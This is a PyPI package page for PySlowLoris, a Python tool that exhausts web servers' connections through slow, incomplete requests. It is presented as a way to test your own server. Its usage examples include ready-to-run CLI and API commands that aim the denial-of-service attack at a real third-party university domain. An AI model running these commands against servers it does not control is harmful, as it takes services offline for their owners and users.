Skip to main content

Asynchronous Python implementation of SlowLoris DoS attack

Project description

PySlowLoris

Gitter chat License Python Build Status PyPI version

PySlowLoris is a tool for testing if your web server is vulnerable to slow-requests kind of attacks. The module is based on python-trio for Asynchronous I/O and poetry for dependency management. The idea behind this approach to create as many connections with a server as possible and keep them alive and send trash headers through the connection. Please DO NOT use this in the real attacks on the servers.

More information about the attack you can find here.

Installation

PyPi

For installation through the PyPI:

$ pip install pyslowloris==2.0.1

This method is prefered for installation of the most recent stable release.

Source-code

For installation through the source-code for local development:

$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ pip install poetry
$ pyenv install 3.8.3
$ pyenv local 3.8.3
$ poetry env use 3.8.3

Basic Usage

Available command list:

$ slowloris --help
usage: slowloris [-h] -u URL [-c CONNECTION_COUNT] [-s]

Asynchronous Python implementation of SlowLoris attack

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Link to a web server (http://google.com) - str
  -c CONNECTION_COUNT, --connection-count CONNECTION_COUNT
                        Count of active connections (default value is 247) - int
  -s, --silent          Ignore all of the errors [pure attack mode] - bool

Docker usage

Download image from Docker Hub

Pull the image from Docker Hub and run a container:

$ docker pull maxkrivich/pyslowloris
$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]

Build image from source-code

Also you can build image from Dockerfile and run a container:

$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]

Note: Don't forget about 'sudo'!

Example of usage

How to use module through Python API

Here is an example of usage

from pyslowloris import HostAddress, SlowLorisAttack

url = HostAddress.from_url("http://kpi.ua")
connections_count = 100

loris = SlowLorisAttack(url, connections_count, silent=True)
loris.start()

How to use module via CLI

The following command helps to use module from command line

$ slowloris -u http://kpi.ua/ -c 100 -s
stop execution: Ctrl + C

Testing

Testing with real apache server

$ docker-compose up web_server -d
$ .....

Module-tests

$ make pytest

Bugs, issues and contributing

If you find bugs or have suggestions about improving the module, don't hesitate to contact me.

License

This project is licensed under the MIT License - see the LICENSE file for details

Copyright (c) 2017-2020 Maxim Krivich

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pyslowloris-2.0.3.tar.gz (8.6 kB view details)

Uploaded Source

Built Distribution

pyslowloris-2.0.3-py3-none-any.whl (13.9 kB view details)

Uploaded Python 3

File details

Details for the file pyslowloris-2.0.3.tar.gz.

File metadata

  • Download URL: pyslowloris-2.0.3.tar.gz
  • Upload date:
  • Size: 8.6 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: poetry/1.8.3 CPython/3.12.5 Linux/6.5.0-1025-azure

File hashes

Hashes for pyslowloris-2.0.3.tar.gz
Algorithm Hash digest
SHA256 76420dd0a87b1435c4be959f5c1c191e12be91dc71f8ac1616db7b8d1de9a815
MD5 15e6565c0e70ebe9b96cab642217093c
BLAKE2b-256 d0c08dfcd5f4cbd414b0e9425aff5c01b2daa33093a2deea8f986516ac8f606c

See more details on using hashes here.

File details

Details for the file pyslowloris-2.0.3-py3-none-any.whl.

File metadata

  • Download URL: pyslowloris-2.0.3-py3-none-any.whl
  • Upload date:
  • Size: 13.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: poetry/1.8.3 CPython/3.12.5 Linux/6.5.0-1025-azure

File hashes

Hashes for pyslowloris-2.0.3-py3-none-any.whl
Algorithm Hash digest
SHA256 fed51a9a9de099a9fdb40b8aa0eab76eaad9cd28f58b3cf476b324ca0d9b8692
MD5 1995a2cab3307b4f7b76eee828b7c881
BLAKE2b-256 09a5ee39fee1466879e80ef923267c17a6456f9d6a2e0518eaa52ee4d8314e79

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page